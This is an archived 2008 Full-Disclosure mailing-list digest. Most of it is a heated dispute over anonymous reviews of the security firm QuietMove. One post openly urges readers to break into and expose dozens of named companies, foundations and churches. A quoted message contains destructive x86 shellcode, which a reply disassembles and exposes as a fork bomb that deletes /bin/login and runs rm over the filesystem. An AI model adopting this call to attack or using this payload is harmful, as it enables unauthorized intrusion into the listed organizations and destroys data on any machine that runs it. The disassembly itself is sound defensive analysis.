> Hosted and sponsored by Secunia - http://secunia.com/

--
"If you think technology is gonna solve your security problems, then you don't understand your problems, and you don't understand the technology."
Bruce Schneier

"Never believe anything until it's officially denied." Claud Cockburn
From gmaggro at rogers.com Wed Jan 2 02:21:54 2008
From: gmaggro at rogers.com (gmaggro)
Date: Tue, 01 Jan 2008 21:21:54 -0500
Subject: [Full-disclosure] Corporations and Institutes to target for attack & exploitation
Message-ID: <477AF542.60500@rogers.com>

I have been doing some thinking, and it seems to me upon surveying the 'scene' (excluding the profiteering criminal element) that too many people resemble anti-globalization protesters. I do not mean that in a positive way; I'm talking about the fools who smash the windows of small businesses in the course of protesting large multinational corporations. There does seem to be a sense of rage, certainly disappointment, in a number of people regarding their ability to effect change... but it's poorly articulated. Someone elsewhere the other day reflected back on the LA Riots, expressing disappointment that the rioters violated their own neighbourhoods instead of tearing up mansions in Beverley Hills. An apt metaphor.

While there isn't enough aggression directed at pop culture noise sites like myspace, youtube, or facebook and others, we risk getting distracted by focusing on that sort instead of laying a beating on entities that deserve a stronger brand of justice. I'm not sure how to strike a balance in that regard anymore.

Might I suggest, or even plead, that you bend your talents towards giving these folks the hardest time possible? Penetrate their networks and those of their partners and make secrets known, their employees uncomfortable - you lie down with dogs, you get fleas - and make the price of doing dirty business as high as possible. Expect complications due to use of fronts, renamings, holding companies, etc. Names come from a mix of sites and are ranked in no particular order of importance.
I'd lay the boots to Monsanto and the Church Of Scientology first, but à chacun son goût.

AB Biodisk AIR QUALITY STANDARDS COALITION ALLIANCE FOR THE PRUDENT USE OF ANTIBIOTICS Abbot Laboratories Accuracy in Media Adam Smith Institute Alcon Research, Ltd. American Enterprise Institute American International Group, Inc Association for Better Living and Education. AstraZeneca Atlas Economic Research Foundation Bionomic Institute Bristol-Myers Squibb Co. Brookings Institution Burstein Technologies, Inc. Castle Rock Foundation (formerly known as The Coors Foundation) Cato Institute Center for Independent Studies Center for Strategic and International Studies Center for the Defense of Free Enterprise Center on Budget and Policy Priorities Charles G. Koch Charitable Foundation Church Of Scientology Church Of Spiritual Technology Claude R. Lambe Charitable Foundation Competitive Enterprise Institute Cubist Pharmaceuticals, Inc. Cult Awareness Network (now a Scientology front) DSM Anti-Infectives, B.V. Discovery Institute Earhart Foundation Essential Therapeutics, Inc. ExxonMobil Foundation for Economic Education Fraser Institute Frontiers of Freedom Institute/People for the USA GlaxoSmithKline Heartland Institute Heritage Foundation Hoover Institute Hudson Institute Institute for Justice Institute for Policy Innovations International Center for Pension Reform JM Foundation John M. Olin Foundation, Inc. LIBRA Initiative, Bayer AG, Pharmaceutical Division Leadership Institute Lilly Research Laboratories Lynde and Harry Bradley Foundation Merck Milton and Rose D. Friedman Foundation Monsanto National Anxiety Center National Center for Policy Analysis National Center for Public Policy Research Ortho-McNeil Pharmaceutical Inc. Pacific Legal Foundation Pacific Research Institute Paratek Pharmaceuticals, Inc. Pharmacia Corporation Philip-Morris/Altria Group, Inc. Political Economy Research Center Progress and Freedom Foundation R.W.
Johnson Pharmaceutical Research Institute of Johnson & Johnson RAND Corporation Reason Foundation Religious Technology Center Roche Pharmaceuticals and Roche Labs Scaife Foundations State Policy Networks's database of state-focused think tanks The Clorox Company The National Forum Foundation The Objectivist Center USAID Washington Legal Foundation World Institute of Scientology Enterprises Wyeth-Ayerst Research Procter & Gamble Pharmaceuticals

From secreview at hushmail.com Wed Jan 2 03:35:12 2008
From: secreview at hushmail.com (SecReview)
Date: Tue, 01 Jan 2008 22:35:12 -0500
Subject: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - )
Message-ID: <20080102033512.49610D0038@mailserver10.hushmail.com>

Readers (and haters)

Just so we're clear, we've offered QuietMove a second shot at being reviewed. As a result we're going to remove our existing review and release a new review in short time. As usual, we'll do our best to make sure that the reviews are truthful and honest.

To date, QuietMove has not provided us with any information that contradicts anything that we've written in our original post. We're still waiting for answers back from them.

Regards,
The Secreview Team
http://secreview.blogspot.com
Professional IT Security Service Providers - Exposed

From reepex at gmail.com Wed Jan 2 04:51:30 2008
From: reepex at gmail.com (reepex)
Date: Tue, 1 Jan 2008 22:51:30 -0600
Subject: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - )
In-Reply-To: <2fd9390e0801011953j12e6fff8j8f5376d7e8306330@mail.gmail.com>
References: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com> <2fd9390e0712311936j4ed56a32tcfca798ea35b5f86@mail.gmail.com> <2fd9390e0801011953j12e6fff8j8f5376d7e8306330@mail.gmail.com>
Message-ID:

On Jan 1, 2008 9:53 PM, Andre Gironda wrote:
> I wouldn't do a direct comparison, but I thought UPT was more about being funny than being seriously challenging.

ok so they are nothing alike because ptp/hts actually teach you stuff while "UPT" was for jokes... so your post was stupid

> Look, you rated Denim Group as A-. You must either work there - or know the guys. Dan Cornell is a moron compared to Adam Muntner - and his code is certainly worse (e.g. Sprajax).

I am not a part of secreview but I realize following email threads is very complicated for you.

> Adam and team know Burp Suite, use manual web application testing - in addition to traditional dynamic and static analysis.
>
> I have seen Adam and crew using Fortify Software's SCA and Tracer tools. I have seen them using Hailstorm ARC and modifying the Javascript included in the SmartAttack library. I would call this a best-of-breed security testing methodology.

So you list 5 tools they use then mention they modify a javascript library... So basically they use automated tools and are former web developers ... sound pretty hardcore

> More people will read mine than anything you do -- and with my name on it -- they are certainly bound to take it a lot more seriously.

You must be a cissp because you take yourself and the internet very seriously.
I am pretty sure no one cares about your opinion either. -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080101/8d7c4794/attachment.html From reepex at gmail.com Wed Jan 2 04:53:31 2008 From: reepex at gmail.com (reepex) Date: Tue, 1 Jan 2008 22:53:31 -0600 Subject: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - ) In-Reply-To: <20080102033512.49610D0038@mailserver10.hushmail.com> References: <20080102033512.49610D0038@mailserver10.hushmail.com> Message-ID: On Jan 1, 2008 9:35 PM, SecReview wrote: > QuietMove has not provided us with any information that contradicts > anything that we've written in our origional post. We're still > waiting for answers back from them. It is probably because they, like everyone else, do not care about your opinion. -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080101/99fab161/attachment.html From coderman at gmail.com Wed Jan 2 06:18:38 2008 From: coderman at gmail.com (coderman) Date: Tue, 1 Jan 2008 22:18:38 -0800 Subject: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - ) In-Reply-To: References: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com> <2fd9390e0712311936j4ed56a32tcfca798ea35b5f86@mail.gmail.com> <2fd9390e0801011953j12e6fff8j8f5376d7e8306330@mail.gmail.com> Message-ID: <4ef5fec60801012218obbc3f6eue847d5464989e709@mail.gmail.com> On Jan 1, 2008 8:51 PM, reepex wrote: > ... > So you list 5 tools they use then mention they modify a javascript > library... So basically they use automated tools and are former web > developers ... sound pretty hardcore this is sufficient skill for lucrative security audit / validation testing in the corporate / gov world. i don't think anyone would call that 'hardcore' exploit / pentest / redteam ability... 
are you in it for money or love? this changes the aspect entirely.

the majority of security services paid for by these organizations is routine application of accepted industry guidelines as defined by usually bulky and cumbersome committees of varied competence and efficacy...

this, and the complete lack of rigor / utility of secreview's sewage writing, is why i could care not even half a mouse's shit less about any of these reviews.

please shut the fuck up secreview. kthx

From secreview at hushmail.com Wed Jan 2 07:17:32 2008
From: secreview at hushmail.com (secreview)
Date: Tue, 1 Jan 2008 23:17:32 -0800 (PST)
Subject: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( F + )
Message-ID: <1199258252954.c15aa66b-499b-44dc-b8f9-5ed2366863fd@google.com>

Our first QuietMove review can be found here.

QuietMove, located at http://www.quietmove.com is a Professional IT Security Services company that was founded by Adam Muntner, Jeffrey Rassas and James G. (Jim) Garvey, Jr. We've already performed one review of QuietMove but Adam Munter and his team didn't like the review. As a result, we've gone back and revisited our data and are producing this second, hopefully more accurate review.

Our first point of criticism is still the QuietMove web-site. Their services are poorly defined, and even somewhat contradictory. For example, under their Penetration Testing section they nearly bash the use of Automated tools. Shortly thereafter they go on to say that they offer services for nearly the same cost as "cookie-cutter" services.

Well, we still have a problem with that. The overhead cost of using quality talent is always going to be far greater than the fees charged by vendors that sell automated scanning software. Any time someone tells us that they can offer "expert driven" services at the same price points or even nearly the same as a "cookie cutter" service, we say bullshit.

Taking it a step further, we still stick by our previous opinion that the QuietMove website doesn't have much to offer prospective customers in the way of useful information. The services shown are very poorly defined; the grammar is still horrible, and frankly the website is incomplete. Want to see what we mean? Click on their "Social Engineering" tab under their service offerings; you'll notice that there is no description. We hope that their website does not reflect the quality of their services.

When Adam Muntner read our previous post where we commented on the QuietMove Website he responded in a reactive, emotional, and unprofessional manner. You can read his response to our first post here, insults and all. Unfortunately for Adam, his unprofessional attitude hurt QuietMove during this second review.

Regardless, Adam did react to our website comments, and his reaction was as follows, verbatim:

"Most of our clients are referred by others who are very satisfied with the work we perform. Not by the website. It doesn't get a lot of attention - were small but growing and focused on serving our clients. I know basic HTML seems like the pinnacle of achievement to you, but we aren't in the business of making pretty web pages. We discuss our methodology with our clients-we don't post it on the web. I know you were hoping to learn nimething. Hacking for dummies might be more your speed, after you perfect your Cunt and Paste skills."

During this second round of review, we were able to locate more information about Adam. We found several posts that Adam made to different mailing lists about FreeBSD, OpenBSD, Systems Administration, etc. We also found a rather nice PowerPoint presentation that Adam created that clearly defined specific security services. So we know that Adam is not an idiot, but we don't know if he's actually a security guru. We're also wondering why Adam doesn't create the same quality content for his QuietMove website as he did for his presentation?

In tandem with Adam's response to our initial review of QuietMove, Adam also had other friends and associates respond. One of those people was Andre Gironda who had a lot of great things to say about QuietMove, but also made the unfortunate mistake of tainting his credibility as a professional by directly attacking other vendors.

Andre Gironda asked us who we are in one of his emails. He also indirectly accused us of exacting vengeance on QuietMove by performing a review. While we've never been accused of this before by any of our other review subjects, we feel that we should state for the record that this is not some sort of vengeance play.

Andre Gironda also said that he can vouch for Adam's 14 years of experience "and then some". Apparently when Andre met Adam of QuietMove, Adam was working as a Unix Security Administrator for Unphamiliar Territories (UPT), "a vulnerability research BBS that ran from 1989 - 1996. Also according to Andre Gironda... It was a prominent place for information about vulnerability research. Many held it in higher regard than Phrack magazine or any leading website/magazine during that time period."

Sorry Andre, but we don't agree with your statement about UPT. Even more importantly, we're not sure how Adam's experience as a Unix Security administrator (aka systems admin) will help him offer professional IT Security Services. Adam needs to be able to protect his clients from real world hackers, not from failed tape backups and disk crashes.

Andre went on to say that many "small businesses such as QuietMove have a hard enough time staying alive in this industry." He said "I suggest you pick on someone your own size even if you have a legitimate problem with QuietMove or Adam." Our response is that we have no problem with Adam or QuietMove. We found QuietMove by doing a google search for Penetration Testing.

In a different email Andre lost all credibility with us because he decided to directly attack other companies that we've reviewed that received higher grades. If you compare the score cards between QuietMove and the other company that Andre bashes, you'll see why they got the good grade. Anyway, here's what Andre had to say (we'll comment later):

"Look, you rated Denim Group as A-. You must either work there - or know the guys. Dan Cornell is a moron compared to Adam Muntner - and his code is certainly worse (e.g. Sprajax).

Adam and team know Burp Suite, use manual web application testing - in addition to traditional dynamic and static analysis.

I have seen Adam and crew using Fortify Software's SCA and Tracer tools. I have seen them using Hailstorm ARC and modifying the Javascript included in the SmartAttack library. I would call this a best-of-breed security testing methodology.

I have worked for many small companies myself who do not use ANY automated testing, including both open-source and commercial tools. I think this is stupid... and spent most of my time writing `for' loops in shell just to get around their limitation on "not writing scripts to automate things".

I have also worked for small companies that "only" use scripting languages, or only use "the best" scripting language (usually Ruby, Python, or Perl) and write all their own automated tools. This is also stupid -- especially when existing toolsets have lots of great capability -- it's like re-inventing the wheel.

Of course there are places that "only use" commercial automated tools, but I haven't actually met one yet. When I do -- I'll go ahead and post an obnoxious review about them. More people will read mine than anything you do -- and with my name on it -- they are certainly bound to take it a lot more seriously."

Andre lost all credibility with our team when he insulted the Denim Group. We contacted the Denim Group and spoke directly with one of their founders when we did their review. Not only were we very impressed with them, but they provided us with great detail about their testing methodologies and service capabilities. Adam, Andre and the rest of the QuietMove team haven't provided us with anything tangible yet, and we've asked. When we tried to contact them the first time we couldn't get hold of them, same for the second.

We're still waiting to hear back from Adam at QuietMove with answers to our questions about the QuietMove services. If we hear back, we'll modify this blog entry yet again to properly reflect what we feel is the truth. We'd also like to make the professional suggestion that QuietMove think about their professional image before they respond to anyone in a public forum. Not only does their reaction not look good but it could make prospective customers turn away.

Lastly, with respect to our comment about Marcin Wielgoszewski, a QuietMove consultant, being "Green", he confirmed that for us in an email. He wrote "You're right. I'm new and young and I'll be the first to admit it. We can't all be born security gurus, and I'm not trying to hide that, but me aside... what have you done besides hide behind your gmail account and troll FD? Thanks for pointing out those two pages, two pages out of 100's that were posted a long time ago and yes, are very out of date."

All in all, it is still our professional opinion that QuietMove doesn't have significant "strong" human talent behind their services. They appear to be a very small company run by someone that is not a "hacker" by nature but instead is a systems administrator or your advanced IT guy with a good understanding of Web Application Security. If you are looking to truly defend yourselves against malicious hackers then we suggest finding a different provider.

Note: If we receive any information back from QuietMove, other than what we've received in emotional reactions, then we'll consider adding that information to this review. If QuietMove can provide us with proof of capability then we will accurately reflect that capability here. We're not in the business of bashing anyone even if they bash us or disrespect us. We are in the business of exposing Professional IT Security Service providers for what they really are to the best of our ability.

If you feel that QuietMove deserves a better grade and can provide us with legitimate reasons as to why, then please comment and we'll consider it. (Even after all of their insults.)

Score Card

--
Posted By secreview to Professional IT Security Providers - Exposed at 1/01/2008 10:38:00 PM

From andreg at gmail.com Wed Jan 2 06:02:43 2008
From: andreg at gmail.com (Andre Gironda)
Date: Tue, 1 Jan 2008 23:02:43 -0700
Subject: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - )
In-Reply-To:
References: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com> <2fd9390e0712311936j4ed56a32tcfca798ea35b5f86@mail.gmail.com> <2fd9390e0801011953j12e6fff8j8f5376d7e8306330@mail.gmail.com>
Message-ID: <2fd9390e0801012202q25c768f6w579df2488d6e2d39@mail.gmail.com>

On Jan 1, 2008 9:51 PM, reepex wrote:
> ok so they are nothing alike because ptp/hts actually teach you stuff while
> "UPT" was for jokes... so your post was stupid

The joke's on you since you don't have the context.

> I am not a part of secreview but I realize following email threads is very
> complicated for you.

It's not complicated.
I simply just don't care about who you are as it relates to the thread. You appear to be attacking the person/people I'm defending, while at the same time defending the secreview post.

> So you list 5 tools they use then mention they modify a javascript
> library... So basically they use automated tools and are former web
> developers ... sound pretty hardcore

Javascript is more than just a language for web developers, especially when utilized in the Hailstorm SmartAttack library, which isn't a Javascript library. These are completely different concepts.

It should also be noted that both Burp Suite and Hailstorm ARC can be used in manual and hybrid modes... with step-modes and form-trainers. They can modify their traversals and have tons of extra customization on top of what other offerings provide... and can customize the underlying "data-driven" attacks.

Certainly you've read some of Adam Muntner's comments on, say, ha.ckers.org and other places?

Allow me to pick on someone in the industry for a second: RSnake. RSnake has an advertisement up on his website that asks, "Which web application scanner can hack it?" "Check the Oct 15 post for study results:"
http://ha.ckers.org/blog/20071014/web-application-scanning-depth-statistics/

Most idiots will only read what RSnake / Larry Suto have written, and will completely miss the comments by Adam Muntner. Adam not only eloquently puts down the testing techniques by Larry Suto, but also makes mention about proper customization of tools and testing outside of the commercial scanners. Effectively, Adam Muntner is one of the only people that does understand this problem that you specifically say that he does not, and that the secreview challenge seems to care about most of all other points.

Where was reepex, where was secreview when RSnake and Larry Suto blundered our industry into submission? Why pick on a hero like Adam Muntner instead? What are you getting out of it?

Worse - RSnake hasn't been called out on this yet - but he has good reason to promote Larry's paper. In fact, it may even be a monetary reason. In an article for INSECURE Magazine, they interview RSnake (page 30):
http://www.net-security.org/dl/insecure/INSECURE-Mag-14.pdf

Question: What web application scanners do you use?

RSnake: [...] my favorite tools in my arsenal (including the manual ones) are: Burp Suite, THC Hydra, fierce, Nessus, Nikto, nmap, NTOSpider (commercial), httprint, Cain, sn00per, Absynthe, Sqlninja, a half dozen Firefox plugins like Webdeveloper, JSView, NoScript, Greasemonkey etc... and the entire suite of unix utils out there, like wget, telnet, ncftp, etc.

Notice the only commercial tool listed is NTOSpider. Coincidence? Apparently, too much admiration of a single web application security scanning vendor can be a bad thing. Larry Suto has only ever worked with Eric Caso at NTObjectives. Adam Muntner has been a customer of several CWE-Compatible and aspiring companies out there. He has a balanced view of both the commercial tools and the open-source world, as well as building his own tools from scratch as the need may be.

> You must be a cissp because you take yourself and the internet very
> seriously. I am pretty sure no one cares about your opinion either.

Wrong again; as always.

Cheers,
Andre

From andreg at gmail.com Wed Jan 2 07:56:33 2008
From: andreg at gmail.com (Andre Gironda)
Date: Wed, 2 Jan 2008 00:56:33 -0700
Subject: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( F + )
In-Reply-To: <1199258252954.c15aa66b-499b-44dc-b8f9-5ed2366863fd@google.com>
References: <1199258252954.c15aa66b-499b-44dc-b8f9-5ed2366863fd@google.com>
Message-ID: <2fd9390e0801012356y50af7086o548e2c89ea6996fa@mail.gmail.com>

On Jan 2, 2008 12:17 AM, secreview wrote:
> Regardless, Adam did react to our website comments, and his reaction was as
> follows, verbatim:

Secreview is clearly anything less than professional. I would say this is a repeat of "InfoSecSellout" if not the exact same people.

> In a Different email Andre lost all credibility with us because he decided
> to directly attack other companies that we've reviewed that received higher
> grades. If you compare the score cards between QuietMove and the other
> company that Andre bashes, you'll see why they got the good grade. Anyway,
> here's what Andre had to say (we'll comment later):

If I know something bad about a company that you gave a good grade to, I feel the need to bash that company based on your reputation alone. In other words, since you can't be trusted, I feel the need to offset any good things you've said by adding my own commentary.

Every security consulting company is unique (they have their own unique good/bad points). Many are small and as I said before, "fighting just to stay in business". If you are going to give poor reviews, I suggest you write them up and keep them to yourself instead of publishing them.

For one of the companies that I worked for in the past, we had a special way of analyzing new products/services. In our assessments, we would gather up all of the good points of the best vendors -- instead of focusing on the bad points of vendors that failed our criteria.

It takes a special kind of asshole to do what you do. I also believe that you know this, and only by hiding behind anonymity are you willing to continue to do what it is that you do.

As far as losing credibility with you, I'm clearly fine with that... I'll be getting plenty of free beer from others who dislike you. Maybe your nepotism will pay off with the companies you give good grades to. Maybe you'll win a Nobel Prize for your amazing methodology of rating security consulting companies by their websites, as well as the scientific method (i.e. using Google to search mailing-lists for people's names).
Cheers,
Andre

From hijacker at oldum.net Wed Jan 2 12:40:11 2008
From: hijacker at oldum.net (Nikolay Kichukov)
Date: Wed, 02 Jan 2008 14:40:11 +0200
Subject: [Full-disclosure] here
In-Reply-To: <421EB9F4-9840-49D5-8DE4-0A3A40EED8D2@gmail.com>
References: <61dea3e30712201851i32064080s2dec5588730f70e9@mail.gmail.com> <421EB9F4-9840-49D5-8DE4-0A3A40EED8D2@gmail.com>
Message-ID: <477B862B.6040808@oldum.net>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Thanks Andrew! Nice catch! ;-)

Cheers,
- -Nikolay

Andrew Farmer wrote:
> On 20 Dec 07, at 18:51, onion ring wrote:
>
>> char sc[] =
>> "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
>> "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
>> "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
>> "\x31\xC0\x89\xC3\x89\xC1\x41\xB0\x30\xCD\x80\x31\xC0\xFE\xC3\x80"
>> "\xFB\x1F\x72\xF3\x04\x40\xCD\x80\x89\xC2\x31\xC0\xB0\x02\xCD\x80"
>> "\x39\xC0\x74\x08\x31\xC0\x89\xC3\xB0\x01\xCD\x80\x31\xC0\xB0\x42"
>> "\xCD\x80\x43\x39\xDA\x74\x08\x89\xD3\x31\xC0\x04\x25\xCD\x80\x31"
>> "\xC0\x50\x68\x6F\x67\x69\x6E\x68\x69\x6E\x2F\x6C\x68\x2F\x2F\x2F"
>> "\x62\x89\xE3\x31\xC0\x04\x0A\xCD\x80\x31\xC0\x50\x68\x2A\x2F\x2F"
>> "\x2F\x89\xE2\x50\x68\x2D\x72\x66\x66\x89\xE1\x50\x68\x6E\x2F\x72"
>> "\x6D\x68\x2F\x2F\x62\x69\x89\xE3\x50\x52\x51\x53\x89\xE1\x31\xD2"
>> "\x04\x0B\xCD\x80";
>
>
> Abbreviated disassembly:
> signal(SIGHUP, SIG_IGN)
> something that looks like a 15-level deep fork() bomb
> something involving kill()
> unlink("/bin/login")
> execve("//bin/rm", {"//bin/rm", "-rff", "*///"})
>
> You could at least try to obfuscate your constants a little better.
> That was way too easy.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iQEVAwUBR3uGKzFLYVOGGjgXAQLqzwgAo4UyRGOIGKt2rHK32x17Imt5axyJIHQF
+sIq8NsJzw5U5psM63MrxIkKajW2c/THOUIbFR4TaFAt1/ng3covsJHh1iX6bpfN
uD18QTY3FHPIv9LNXoYgtJmLiUBFqY1AWXd5ih1e/LMRa9ZP8KVjv14EnmJom8tP
qL/WEtYjq60reaLpLpowhVLi4q1KKjvC4BoRz7zGmp26As6ah/5HmYpjpsiA7cKg
v7959l4bQsy0QHG6YP+pY8PfQX3KmhFns1yAsQF93TMGx3N8LYa1fdcXkZLrw5nf
L8tI3QZ+Qhu4lck+QzElCtD3sUuB4z/ae+KsJWWJuGoDe7CdrR5Yug==
=bBbH
-----END PGP SIGNATURE-----

From adam.muntner at quietmove.com Wed Jan 2 14:32:42 2008
From: adam.muntner at quietmove.com (Adam Muntner)
Date: Wed, 2 Jan 2008 09:32:42 -0500
Subject: [Full-disclosure] Secreview re-review of quietmove ( F ---)
In-Reply-To: <1199258252954.c15aa66b-499b-44dc-b8f9-5ed2366863fd@google.com>
References: <1199258252954.c15aa66b-499b-44dc-b8f9-5ed2366863fd@google.com>
Message-ID: <69B8184A-012C-4779-B23D-57909EFAFFA7@quietmove.com>

Andre is a friend but not an employee or representative of the business - HOWEVER - there were a number of inaccuracies in his statements about me. A selection of corrections to statements are below.

- I never ran UPT.
- All the speculation about our methodology and pricing was wrong.
- The quantity of automated vs hands-on testing we perform is based on what the customer is willing to pay for. Novel concept. We explain carefully what can and can't be found. The customer selects their appropriate level of risk acceptance based on the value of the target of evaluation and their budget. We always try to go above and beyond.
- Our overhead is low - no giant headquarters - we are virtual mostly except for a rack cage. We don't have to support a giant marketing team and don't do $20k trade show booths. As a result that isn't built into our pricing.
- I was never a 'Unix admin' but did engineer one of the early commercially avail Beowulf clusters - in 1998 - and have run some unix boxes, meaning it took all of 3 hours a month of my time, but I was not a 'unix admin' by any stretch of the imagination. The OpenBSD posts were from what, 10 years ago? More evidence of your poor arithmetic skills from the initial post.
- The website wasn't updated because I am taking a vacation to NYC and would rather enjoy myself than meet some 12 hour unmentioned timetable to edit the website by an anonymous coward pfy.
- They weren't insults, they were sarcastic though accurate representations of your subpar (at best) review capabilities.
- Others, but really, who cares? You are not interested in facts as I will prove below.

Your analysis is worthless. Several weeks ago you posted your alleged methodology. It included contacting the vendor PRIOR to review, which you didn't do. You also didn't notify us of the review. I read it on FD myself. You sent a list of questions on New Year's Day, after you posted the review, and half a day later posted your re-review without again contacting me directly except with a monster list of questions - not so much as a phone call. Your alleged review was based on list noise, not speaking with me. You still have yet to post your scoring methodology as promised. You fail.

Frankly I find the drama and anonymous weenie-waving on this list to be tedious. FD is more a running joke than a productive mailing list. Save the drama fo yo mama.

On my timetable I'll respond to your questions.... To the list, not to you directly. Frankly I don't trust you to represent them accurately. Right now I'm going to visit the Metropolitan Museum of Art, and tonight go party - not answer your essay test. Sorry to disappoint. As a number of list members commented privately to me - you don't deserve the attention.
That said, if you can prove you will follow your own previously stated methodology, I'll re review your review system. Following your methodology I will post a f----------- score in 6-12 hours or maybe sooner if you don't respond. That's a joke, son. ;) Adam Muntner Managing Partner QuietMove, Inc. http://www.quietmove.com Sorry for typos - sent from my 31337 jailbroken iPhone. It runs unix. I guess that makes me a unix admin! On Jan 2, 2008, at 2:17 AM, secreview wrote: > Our first QuietMove review can be found here. > > QuietMove, located at http://www.quietmove.com is a Professional IT > Security Services company that was founded by Adam Muntner, Jeffrey > Rassas and James G. (Jim) Garvey, Jr. We?ve already performed one re > view of QuietMove but Adam Munter and his team didn?t like the revie > w. As a result, we?ve gone back and revisited our data and are produ > cing this second, hopefully more accurate review. > > Our first point of criticism is still the QuietMove web-site. Their > services are poorly defined, and even somewhat contradictory. For > example, under their Penetration Testing section they nearly bash > the use of Automated tools. Shortly thereafter they go on to say > that they offer services for nearly the same cost as ?cookie- > cutter? services. > > Well, we still have a problem with that. The overhead cost of using > quality talent is always going to be far greater than the fees > charged by vendors that sell automated scanning software. Any time > someone tells us that they can offer ?expert driven? services at > the same price points or even nearly the same as a ?cookie > cutter? service, we say bullshit. > > Taking it a step further, we still stick by our previous opinion > that the QuietMove website doesn?t have much to offer prospective cu > stomers in the way of useful information. The services shown are ver > y poorly defined; the grammar is still horrible, and frankly the web > site is incomplete. 
Want to see what we mean, click on their ?Social > Engineering? tab under their service offerings; you?ll notice > that there is no description. We hope that their website does not re > flect the quality of their services. > > When Adam Muntner read our previous post where we commented on the > QuietMove Website he responded in a reactive, emotional, and > unprofessional manner. You can read his response to our first post > here, insults and all. Unfortunately for Adam, his unprofessional > attitude hurt QuietMove during this second review. > > Regardless, Adam did react to our website comments, and his reaction > was as follows, verbatim: > > ?Most of our clients are referred by others who are very satisfied w > ith the work we perform. Not by the website. It doesn't get a lot of > attention - were small but growing and focused on serving our clien > ts. I know basic HTML seems like the pinnacle of achievement to you, > but we aren't in the business of making pretty web pages. We discus > s our methodology with our clients-we don't post it on the web. I kn > ow you were hoping to learn nimething. Hacking for dummies might be > more your speed, after you perfect your Cunt and Paste skills.? > > During this second round of review, we were able to locate more > information about Adam. We found several posts that Adam made to > different mailing lists about FreeBSD, OpenBSD, Systems > Administration, etc. We also found a rather nice PowerPoint > presentation that Adam created that clearly defined specific > security services. So we know that Adam is not an idiot, but we don? > t know if he?s actually a security guru. We?re also wondering why > Adam doesn?t create the same quality content for his QuietMove websi > te as he did for his presentation? > > In tandem with Adam?s response to our initial review of QuietMove, A > dam also had other friends and associates respond. 
One of those peop > le was Andre Gironda who had a lot of great things to say about Quie > tMove, but also made the unfortunate mistake of tainting his credibi > lity as a professional by directly attacking other vendors. > > Andre Gironda asked us who we are in one of his emails. He also > indirectly accused us of exacting vengeance on QuietMove by > performing a review. While we?ve never been accused of this before b > y any of our other review subjects, we feel that we should state for > the record that this is not some sort of vengeance play. > > Andre Gironda also said that he can vouch for Adam?s 14 years of exp > erience ?and then some?. Apparently when Andre met Adam of > QuietMove, Adam was working as a Unix Security Administrator for Unp > hamiliar. Territories (UPT), ?a vulnerability research BBS that ran > from 1989 ? 1996. Also according to Andre Gironda ?. It was a > prominent place for information about vulnerability research. Many h > eld it in higher regard than Phrack magazine or any leading website/ > magazine during that time period.? > > Sorry Andre, but we don?t agree with your statement about UPT. Even > more importantly, we?re not sure how Adam?s experience as a Unix > Security administrator (aka systems admin) will help him offer profe > ssional IT Security Services. Adam needs to be able to protect his c > lients from real world hackers, not from failed tape backups and dis > k crashes. > > Andre went on to say that many ?small businesses such as QuietMove h > ave a hard enough time staying alive in this industry.? He said > ?I suggest you pick on someone your > own size even if you have a legitimate problem with QuietMove or > Adam.? Our response is that we have no problem with Adam or QuietMov > e. We found QuietMove by doing a google search for Penetration Testi > ng. > > In a Different email Andre lost all credibility with us because he > decided to directly attack other companies that we?ve reviewed that > received higher grades. 
If you compare the score cards between Quiet > Move and the other company that Andre bashes, you?ll see why they go > t the good grade. Anyway, here?s what Andre had to say (we?ll > comment later): > > ?Look, you rated Denim Group as A-. You must either work there - or > know the guys. Dan Cornell is a moron compared to Adam Muntner - and > his code is certainly worse (e.g. Sprajax). > > Adam and team know Burp Suite, use manual web application testing - in > addition to traditional dynamic and static analysis. > > I have seen Adam and crew using Fortify Software's SCA and Tracer > tools. I have seen them using Hailstorm ARC and modifying the > Javascript included in the SmartAttack library. I would call this a > best-of-breed security testing methodology. > > I have worked for many small companies myself who do not use ANY > automated testing, including both open-source and commercial tools. I > think this is stupid... and spent most of my time writing `for' loops > in shell just to get around their limitation on "not writing scripts > to automate things". > > I have also worked for small companies that "only" use scripting > languages, or only use "the best" scripting language (usually Ruby, > Python, or Perl) and write all their own automated tools. This is > also stupid -- especially when existing toolsets have lots of great > capability -- it's like re-inventing the wheel. > > Of course there are places that "only use" commercial automated tools, > but I haven't actually met one yet. When I do -- I'll go ahead and > post an obnoxious review about them. More people will read mine than > anything you do -- and with my name on it -- they are certainly bound > to take it a lot more seriously.? > > Andre lost all credibility with our team when he insulted the Denim > Group. We contacted the Denim Group and spoke directly with one of > their founders when we did their review. 
> Not only were we very impressed with them, but they provided us with great detail about their testing methodologies and service capabilities. Adam, Andre and the rest of the QuietMove team haven't provided us with anything tangible yet, and we've asked. When we tried to contact them the first time we couldn't get hold of them, same for the second.
>
> We're still waiting to hear back from Adam at QuietMove with answers to our questions about the QuietMove services. If we hear back, we'll modify this blog entry yet again to properly reflect what we feel is the truth. We'd also like to make the professional suggestion that QuietMove think about their professional image before they respond to anyone in a public forum. Not only does their reaction not look good, but it could make prospective customers turn away.
>
